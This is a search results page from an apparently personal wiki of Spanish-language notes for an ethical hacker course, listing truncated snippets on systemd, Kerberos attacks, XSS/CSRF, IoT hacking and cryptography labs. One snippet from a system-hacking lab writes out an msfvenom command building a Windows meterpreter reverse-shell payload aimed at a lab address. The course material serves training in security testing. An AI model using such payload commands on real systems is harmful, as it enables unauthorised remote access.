Cerca

Heus ací els resultats de la cerca.

Apuntes SinCara Extras systemd @info:cursos:pue:ethical-hacker:extras
74 Resultats, Darrera modificació:
a Extras systemd == Consideraciones iniciales * Se presenta el 30 de abril de 2010, por Lennart Poet... o SysV init o Upstart (de Canonical / Ubuntu) * Se enfoca en la eficiencia, la rapidez y la robustez... : Es el administrador de dispositivos de SystemD. Se encarga de la detección y gestión dinámica de dis... ón DNS. No suele estar activo, ya que normalmente se utilizan otros servicios: * **NetworkManager
Ethical Hacker : sesión 4
56 Resultats, Darrera modificació:
[[info:cursos:pue:ethical-hacker:sesion4]] == clase * Modulo 14 * Modulo 15 * Modulo 16 * Mod... * https://certifiedhacker.com/<portales/ * se pueden escanear, permitido * ejemplos de vu... pass-the-cookie * robar cookies para logearse en una web * same-site * command injectio... os objetos en diferentes procesos pueden comunicarse entre si, preguntando a UDDI por su localización,
Apuntes SinCara sesión 1 @info:cursos:pue:ethical-hacker:sesion1
33 Resultats, Darrera modificació:
esponsable de TI). Reporta directamente al CEO, y se encarga directamente de las estrategias de la org... e la seguridad de la organización. Al CSO a veces se le denomina responsable de seguridad corporativa.... ción con los objetivos del negocio. De esta forma se garantiza en todo momento que la información de l... * https://www.hornetsecurity.com/es/knowledge-base/cyber-kill-chain/ - Cyber Kill Chain * TTP: Las
Apuntes SinCara Extras XSS, CSRF y SSRF @info:cursos:pue:ethical-hacker:extras
31 Resultats, Darrera modificació:
top25/index.html * A una URL legítima y válida, se le añade un script o código que se ejecuta en el cliente (Tipo 1), o también puede estar añadido en u... XSS Reflejado o No Persistente**: Este ataque no se ejecuta en la aplicación web, sino que es una inyección de código que se inicia en el momento que el usuario pincha en un
Apuntes SinCara Extras @info:cursos:pue:ethical-hacker:extras
23 Resultats, Darrera modificació:
empre cifrado. * El Wifi y la telefonía móvil se puede manipular, hay que usar VPN siempre. * El SMS es el 2FA más débil, se recomienda usar cualquier otro tipo de 2FA. * E... El juego de la vida de John Conway. El deslizador se ha convertido en el emblema de los hackers. *... //t.me/ThreatIntelligence - Canal de Noticias (no se puede escribir en él, solo leer), de la comunidad
Apuntes SinCara sesión 2 @info:cursos:pue:ethical-hacker:sesion2
20 Resultats, Darrera modificació:
car-kerberos/ - Ataques a Kerberos * Kerberos se divide principalmente en 5 pasos: * KRB_AS_... ing (Cracking TGT) * El ataque ASREPRoast se basa en encontrar usuarios que no requieren pre-a... del mensaje cifrado con la clave del usuario, que se obtiene de su contraseña. * Por lo tanto, este mensaje se puede tratar de crackear offline para obtener las
Apuntes SinCara sesión 4 @info:cursos:pue:ethical-hacker:sesion4
20 Resultats, Darrera modificació:
s://www.zaproxy.org/ - En septiembre de 2024, ZAP se van a Checkmarx, pero previamente, en 2023 se habían ido a la Fundación Linux * Análisis de segurid... e previene que la respuesta sea cacheada. * Se envía una URL, con un código (JavaScript o el que sea), que interactua con ese dominio. * El usuario ejecuta esa URL en su
Apuntes SinCara sesión 5 @info:cursos:pue:ethical-hacker:sesion5
20 Resultats, Darrera modificació:
ilidad IoT, que 13 años después sigue sin parchearse. * https://www.xataka.com/internet-of-things/... icrono/hardware/20201121/robot-aspirador-convertirse-consiguen-hackearlos-grabar-distancia/537446597_0... 58b4630.html - Un hacker roba en un casino colándose a través de una pecera * https://www.theguard... ng * https://shop.netgate.com/products/2100-base-pfsense - Netgate SG-2100 Security Gateway with p
Apuntes SinCara Extras Privacidad @info:cursos:pue:ethical-hacker:extras
18 Resultats, Darrera modificació:
nuxadictos.com/kodachi-linux-una-distro-anti-forense-de-codigo-abierto.html - Kodachi Linux una distro anti forense de código abierto * https://www.digi77.com/lin... disposición SSOO en máquinas virtuales a las que se puede acceder remotamente desde su interfaz de ma... * Obfsproxy * Subproyecto de Tor, pero que se puede utilizar para ofuscar una conexión VPN sobr
Apuntes SinCara Extras IPSec @info:cursos:pue:ethical-hacker:extras
14 Resultats, Darrera modificació:
or, o de ordenador a red. * La cabecera IPsec se insertará a continuación de la cabecera IP y just... ga útil es autenticada y opcionalmente cifrada, y se mantienen las direcciones IP originales. * El... protocolo IPsec y de la clave para poder entenderse. * Modo Túnel. * Modo de comunicación entre redes, pero también se usa con ordenadores con redes, y ordenadores con
Ethical Hacker : sesión 2
12 Resultats, Darrera modificació:
[[info:cursos:pue:ethical-hacker:sesion2]] == clase * ASPEN * Modulo 06 - System Hacking * ... f* (casi todas) * Modulos: * Exploit: base para crear uno * Payload: comunicación ... ficación del EIP * Identificar Offset * se cargan en zonas aleatorias de memoria para evitar... ==== sección 2: escalada de privilegios * si no se especifica el path completo de la libreria, se pu
Lab Module 20 Cryptography @info:cursos:pue:ethical-hacker:sesion5
11 Resultats, Darrera modificació:
ay’s information-based organizations extensively use the Internet for e-commerce, market research, cus... lp in securing data from interception and compromise during online transmissions. Cryptography enables... mission. The labs in this module demonstrate the use of encryption to protect information systems in o... thical hacker and penetration tester, you should use various cryptography techniques or tools to prote
Apuntes SinCara sesion 3 @info:cursos:pue:ethical-hacker:sesion3
10 Resultats, Darrera modificació:
nstwist - Para detectar dominios registrados que se parezcan al tuyo, para ver posibles ataques de im... gundo * Mapas de ciberataques: * https://norse-corp.com/map/ - Recopilatorio de mapas de ciberat... itpotam-ntlm-permite-que-los-piratas-informaticos-se-apoderen-de-los-dominios-de-windows/herramientas-... * https://community.broadcom.com/symantecenterprise/viewdocument/evading-nids-revisited - Resumen de
Lab Module 18 IoT and OT Hacking @info:cursos:pue:ethical-hacker:sesion5
10 Resultats, Darrera modificació:
o https://www.exploit-db.com/google-hacking-database. - The Google Hacking Database page appears; type SCADA in the Quick Search field and press Enter. ... 20250221-012050.png?500}} - Similarly, you can use advanced search operators such as intitle:"index ... e IoT simulator on the client machine using Bevywise_IoTSimulator_3.exe \\ {{:info:cursos:pue:ethical
Lab Module 06: Sytem hacking @info:cursos:pue:ethical-hacker:sesion2
9 Resultats, Darrera modificació:
Task 2: Gain Access to a Remote System using Reverse Shell Generator ==== cmd * ''docker run -d -p 80:80 reverse_shell_generator'' * ''http://localhost'' * ... cción: ''msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f exe -o reverse.exe'' * se genera un EXE - payload (que hemos d
Lab Module 19 Cloud Computing @info:cursos:pue:ethical-hacker:sesion5
9 Resultats, Darrera modificació:
Ethical Hacker : extras
7 Resultats, Darrera modificació:
Ethical Hacker : sesión 3
6 Resultats, Darrera modificació:
Ethical Hacker : sesión 1
5 Resultats, Darrera modificació:
Ethical Hacker : shellgpt
3 Resultats, Darrera modificació:
Lab Module 09: Social Engineering @info:cursos:pue:ethical-hacker:sesion3
2 Resultats, Darrera modificació:
Ethical Hacker : sesión 5
1 Resultats, Darrera modificació:
Lab Module 07 @info:cursos:pue:ethical-hacker:sesion2
1 Resultats, Darrera modificació:
Lab Module 13 @info:cursos:pue:ethical-hacker:sesion4
1 Resultats, Darrera modificació: